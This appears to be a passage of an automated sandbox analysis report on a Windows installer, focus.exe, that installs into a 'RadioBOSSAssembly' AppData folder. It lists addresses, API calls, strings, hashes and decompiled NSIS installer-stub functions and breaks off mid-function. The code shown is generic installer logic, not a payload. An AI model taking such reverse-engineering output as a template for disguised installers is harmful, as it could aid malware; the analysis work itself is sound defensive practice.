0x00403ecc
0x00403ed2
0x00403ed6
0x00403ed6
0x00403edb
0x00403ee1
0x00000000
0x00000000
0x00403eec
0x00403ef2
0x00000000
0x00000000
0x00403efb
0x00403f03
0x00403f08
0x00403f0b
0x00403f11
0x00403f16
0x00403f19
0x00403f1f
0x00403f24
0x00403f27
0x00403f2d
0x00403f35
0x00403f3b
0x00403f41
0x00403f45
0x00403f4c
0x00403f4c
0x00403f4c
0x00403f56
0x00403f68
0x00403f74
0x00403f79
0x00403f83
0x00403f89
0x00403f8b
0x00403f90
0x00403f8d
0x00403f8d
0x00403f8d
0x00403fa0
0x00403fb8
0x00403fba
0x00403fc0
0x00403fd5
0x00403fc2
0x00403fcb
0x00403fcd
0x00403fcd
0x00403fdb
0x00403fec
0x00403ffd
0x00404004
0x0040400a
0x0040400e
0x00404013
0x00404015
0x00000000
0x0040401b
0x0040401b
0x0040401d
0x00000000
0x00000000
0x00404023
0x00404027
0x0040404c
0x00404052
0x00404058
0x0040405a
0x00000000
0x00000000
0x00404080
0x00404086
0x00404088
0x0040408d
0x00000000
0x00000000
0x00404093
0x00404096
0x00404099
0x004040b0
0x004040bc
0x004040d5
0x004040db
0x004040df
0x004040e4
0x004040ea
0x00000000
0x00000000
0x004040f4
0x004040ff
0x00000000
0x004040ff
0x00404029
0x0040402f
0x00000000
0x00000000
0x00404035
0x0040403b
0x00000000
0x00000000
0x00000000
0x00404041
0x00404015
0x0040410c
0x00404118
0x0040411f
0x00000000
0x00403e6f
0x00403e6f
0x00403e72
0x00403ea5
0x00403ea5
0x00403ea7
0x00000000
0x00000000
0x00000000
0x00403ea7
0x00403e74
0x00403e78
0x00403e7d
0x00403e7f
0x00000000
0x00000000
0x00403e8f
0x00403e97
0x00000000
0x00403e9d
0x00403ccb
0x00403ccb
0x00403ccf
0x00403cd4
0x00403ce3
0x00403ce3
0x00403cec
0x00403cf5
0x00403d00
0x00403d00
0x00403d0c
0x00403d28
0x00403d2b
0x00403d3e
0x00403d44
0x00403de7
0x00000000
0x00403df0
0x00403d4a
0x00403d57
0x00403d59
0x00403d5b
0x00403d7a
0x00403d7a
0x00403d7d
0x00403d82
0x00403d85
0x00403d95
0x00403d96
0x00403d98
0x00403dce
0x00403de1
0x00000000
0x00403de1
0x00403d9a
0x00403da0
0x00403db9
0x00403dbe
0x00403dc0
0x00000000
0x00000000
0x00403dc2
0x00403dae
0x00403dae
0x00403db0
0x00403db0
0x00000000
0x00403db0
0x00403da3
0x00403da8
0x00000000
0x00403da8
0x00403d87
0x00403d8d
0x00000000
0x00000000
0x00403d8f
0x00000000
0x00403d8f
0x00403d7f
0x00000000
0x00403d7f
0x00403d65
0x00403d6c
0x00403d72
0x00403d74
0x00000000
0x00000000
0x00000000
0x00403d74
0x00403d30
0x00000000
0x00403d0e
0x00403d14
0x00403d1e
0x00404125
0x0040412b
0x0040412d
0x00404133
0x00404138
0x0040413e
0x0040413e
0x00404133
0x00404148
0x00000000
0x00404148
0x00403d0c

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
ShowWindow.USER32(?), ref: 00403D00
DestroyWindow.USER32 ref: 00403D14
SetWindowLongA.USER32 ref: 00403D30
GetDlgItem.USER32 ref: 00403D51
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
IsWindowEnabled.USER32(00000000), ref: 00403D6C
GetDlgItem.USER32 ref: 00403E1A
GetDlgItem.USER32 ref: 00403E24
KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403E3E
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
GetDlgItem.USER32 ref: 00403F35
ShowWindow.USER32(00000000,?), ref: 00403F56
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F68
EnableWindow.USER32(?,?), ref: 00403F83
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
EnableMenuItem.USER32 ref: 00403FA0
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
lstrlenA.KERNEL32(Name Setup: Completed,?,Name Setup: Completed,00000000), ref: 00403FF5
SetWindowTextA.USER32(?,Name Setup: Completed), ref: 00404004
ShowWindow.USER32(?,0000000A), ref: 00404138

Strings

Name Setup: Completed, xrefs: 00403FE5, 00403FEB, 00403FF4, 00404002

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
String ID: Name Setup: Completed
API String ID: 3906175533-1721692471
Opcode ID: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
Opcode Fuzzy Hash: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040390A, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040390A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f434;
				_t17 = E00406500(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a890;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00405FDE(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a890, 0);
					__eflags =  *0x42a890; // 0x4e
					if(__eflags == 0) {
						E00405FDE(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a890, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E00406055("1033",  *_t17() & 0x0000ffff);
				}
				E00403BCF(_t71, _t84);
				_t80 = "C:\\Users\\hardz\\AppData\\Roaming\\RadioBOSSAssembly";
				 *0x42f4c0 =  *0x42f43c & 0x00000020;
				 *0x42f4dc = 0x10000;
				if(E00405B7D(_t84, "C:\\Users\\hardz\\AppData\\Roaming\\RadioBOSSAssembly") != 0) {
					L16:
					if(E00405B7D(_t92, _t80) == 0) {
						E0040618A(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118))); // executed
					}
					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42ec08 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403BCF(_t71, __eflags);
							__eflags =  *0x42f4e0;
							if( *0x42f4e0 != 0) {
								_t28 = E004052F0(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ebec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a870, 5); // executed
							_t34 = E00406492("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E00406492("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebc0);
								 *0x42ebe4 = _t81;
								RegisterClassA(0x42ebc0);
							}
							_t36 =  *0x42ec00; // 0x0
							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403CA7, 0); // executed
							E0040385A(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f420;
						 *0x42ebc4 = E00401000;
						 *0x42ebd0 =  *0x42f420;
						 *0x42ebd4 = _t25;
						 *0x42ebe4 = 0x40a1f4;
						if(RegisterClassA(0x42ebc0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a870 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3c0;
					E00405FDE(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f478, 0x42e3c0, 0);
					_t57 =  *0x42e3c0; // 0x3a
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3c1;
						 *((char*)(E00405ABA(0x42e3c1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E004060F7(_t80, E00405A8F(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405AD6(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403910
0x00403919
0x00403920
0x00403922
0x00403936
0x00403948
0x0040394f
0x00403956
0x0040395c
0x00403961
0x00403967
0x0040397a
0x0040397a
0x00403985
0x00403924
0x0040392f
0x0040392f
0x0040398a
0x00403994
0x0040399d
0x004039a2
0x004039b3
0x00403a3a
0x00403a42
0x00403a4b
0x00403a4b
0x00403a61
0x00403a67
0x00403a75
0x00403af6
0x00403afe
0x00403b08
0x00403b0d
0x00403b13
0x00403b9d
0x00403ba2
0x00403ba4
0x00403bc0
0x00000000
0x00403bc0
0x00403ba6
0x00403bac
0x00403bb4
0x00403bb4
0x00000000
0x00403bac
0x00403b21
0x00403b2c
0x00403b31
0x00403b33
0x00403b3a
0x00403b3a
0x00403b45
0x00403b4d
0x00403b4f
0x00403b51
0x00403b5a
0x00403b5d
0x00403b63
0x00403b63
0x00403b69
0x00403b82
0x00403b93
0x00000000
0x00403b98
0x00403b00
0x00403b02
0x00000000
0x00403a77
0x00403a77
0x00403a83
0x00403a8d
0x00403a93
0x00403a98
0x00403aa7
0x00403bc5
0x00403bc5
0x00000000
0x00403bc5
0x00403ab6
0x00403af1
0x00000000
0x00403af1
0x004039b9
0x004039b9
0x004039bc
0x004039be
0x00000000
0x00000000
0x004039c8
0x004039d8
0x004039dd
0x004039e4
0x00000000
0x00000000
0x004039e8
0x004039ea
0x004039f7
0x004039f7
0x004039ff
0x00403a05
0x00403a2d
0x00403a35
0x00000000
0x00403a17
0x00403a18
0x00403a21
0x00403a27
0x00403a28
0x00000000
0x00403a28
0x00403a23
0x00403a25
0x00000000
0x00000000
0x00000000
0x00403a25
0x00403a05

APIs

Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D

lstrcatA.KERNEL32(1033,Name Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Name Setup: Completed,00000000,00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\focus.exe" ,00000000), ref: 00403985
lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\RadioBOSSAssembly,1033,Name Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Name Setup: Completed,00000000,00000002,74B5FA90), ref: 004039FA
lstrcmpiA.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\RadioBOSSAssembly,1033,Name Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Name Setup: Completed,00000000), ref: 00403A0D
GetFileAttributesA.KERNEL32(: Completed), ref: 00403A18
LoadImageA.USER32 ref: 00403A61

Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062

RegisterClassA.USER32 ref: 00403A9E
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
CreateWindowExA.USER32 ref: 00403AEB
ShowWindow.USER32(00000005,00000000), ref: 00403B21
GetClassInfoA.USER32 ref: 00403B4D
GetClassInfoA.USER32 ref: 00403B5A
RegisterClassA.USER32 ref: 00403B63
DialogBoxParamA.USER32 ref: 00403B82

Strings

1033, xrefs: 0040392A, 00403980
RichEdit20A, xrefs: 00403B45, 00403B4B
RichEd20, xrefs: 00403B27
C:\Users\user\AppData\Local\Temp\, xrefs: 0040390F
Name Setup: Completed, xrefs: 00403936, 0040393C, 00403961, 0040396A, 0040397F
RichEd32, xrefs: 00403B35
: Completed, xrefs: 004039C8, 004039D0, 004039DD, 00403A27, 00403A2D
.DEFAULT\Control Panel\International, xrefs: 00403970
Control Panel\Desktop\ResourceLocale, xrefs: 0040393E
RichEdit, xrefs: 00403B54
C:\Users\user\AppData\Roaming\RadioBOSSAssembly, xrefs: 00403994, 0040399C, 00403A34, 00403A3A, 00403A4A
.exe, xrefs: 00403A07
_Nb, xrefs: 00403A7D, 00403AE5
"C:\Users\user\Desktop\focus.exe" , xrefs: 0040390E

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\focus.exe" $.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\RadioBOSSAssembly$Control Panel\Desktop\ResourceLocale$Name Setup: Completed$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-2077995464
Opcode ID: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
Opcode Fuzzy Hash: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA1, Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 181
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00402EA1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\hardz\\Desktop\\focus.exe";
				 *0x42f430 = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\focus.exe", 0x400);
				_t89 = E00405C90(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\hardz\\Desktop";
				E004060F7("C:\\Users\\hardz\\Desktop", _t91);
				E004060F7("focus.exe", E00405AD6(_t92));
				_t50 = GetFileSize(_t89, 0);
				 *0x42944c = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E3D(1);
					if( *0x42f438 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E00403300( *0x42f438 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030D8(); // executed
						if(_t57 == _v24) {
							 *0x42f434 = _t94;
							 *0x42f43c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42f440 =  *0x42f440 + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405C4B(0x42f460, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E00403300( *0x41d440);
					if(E004032EA( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42f438) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E004032EA(0x415440, _t90) == 0) {
							E00402E3D(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42f438 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E3D(0);
							}
							goto L20;
						}
						E00405C4B( &_v44, 0x415440, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x41d440; // 0x2b691b
							 *0x42f4e0 =  *0x42f4e0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x42f438 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t24 = _t80 - 4; // 0x40a194
								_t93 = _t24;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x42944c) {
							_v12 = E004065B7(_v12, 0x415440, _t90);
						}
						 *0x41d440 =  *0x41d440 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}

0x00402ea9
0x00402eac
0x00402eaf
0x00402eb2
0x00402eb8
0x00402ec9
0x00402ece
0x00402ee1
0x00402ee6
0x00402ee9
0x00402eef
0x00000000
0x00402ef1
0x00402efc
0x00402f02
0x00402f13
0x00402f1a
0x00402f22
0x00402f27
0x00402f29
0x00403014
0x00403016
0x00403022
0x00000000
0x00000000
0x00403027
0x0040304b
0x00403050
0x00403056
0x00403061
0x00403066
0x00403069
0x0040306a
0x0040306b
0x0040306d
0x00403075
0x0040308c
0x00403094
0x00403099
0x0040309b
0x0040309b
0x004030a3
0x004030a3
0x004030a6
0x004030a7
0x004030a7
0x004030aa
0x004030ac
0x004030ac
0x004030b6
0x004030bc
0x004030ca
0x00000000
0x004030cf
0x00000000
0x00403075
0x0040302f
0x00403041
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f2f
0x00402f34
0x00402f39
0x00402f3d
0x00402f44
0x00402f4b
0x00402f4d
0x00402f4d
0x00402f58
0x00403080
0x00403077
0x00000000
0x00403077
0x00402f65
0x00402fe5
0x00402fe9
0x00402fee
0x00000000
0x00402fe5
0x00402f6e
0x00402f73
0x00402f7b
0x00402fa1
0x00402fa7
0x00402fb0
0x00402fb6
0x00402fbb
0x00402fc1
0x00000000
0x00000000
0x00402fcb
0x00402fd3
0x00402fd6
0x00402fd6
0x00402fdb
0x00402fdd
0x00402fdd
0x00000000
0x00000000
0x00000000
0x00000000
0x00402fcb
0x00402fef
0x00402ff5
0x00403001
0x00403001
0x00403004
0x0040300a
0x0040300a
0x00403012
0x00000000
0x00403012

APIs

GetTickCount.KERNEL32 ref: 00402EB2
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\focus.exe,00000400), ref: 00402ECE

Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\focus.exe,80000000,00000003), ref: 00405C94
Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6

GetFileSize.KERNEL32(00000000,00000000,focus.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\focus.exe,C:\Users\user\Desktop\focus.exe,80000000,00000003), ref: 00402F1A
GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050

Strings

@TA, xrefs: 00402F2F
C:\Users\user\Desktop\focus.exe, xrefs: 00402EB8, 00402EC7, 00402EDB, 00402EFB
soft, xrefs: 00402F8F
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403077
focus.exe, xrefs: 00402F0E
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EA8
C:\Users\user\Desktop, xrefs: 00402EFC, 00402F01, 00402F07
Null, xrefs: 00402F98
Error launching installer, xrefs: 00402EF1
"C:\Users\user\Desktop\focus.exe" , xrefs: 00402EA1
Inst, xrefs: 00402F86

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\focus.exe" $@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\focus.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$focus.exe$soft
API String ID: 2803837635-7631965
Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040618A, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040618A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ebfc; // 0x71a1b4
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f478;
				_t39 = 0x42e3c0;
				_t90 = 0x42e3c0;
				if(_a4 >= 0x42e3c0 && _a4 - 0x42e3c0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E0040618A(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3c0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E004060F7(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E00406055(_t90,  *0x42f428);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E004063D2(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f42c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4c4;
						if( *0x42f4c4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f424;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f428,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f428,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90); // executed
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00405FDE((_t80 & 0x0000003f) +  *0x42f478, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f478, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E0040618A(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
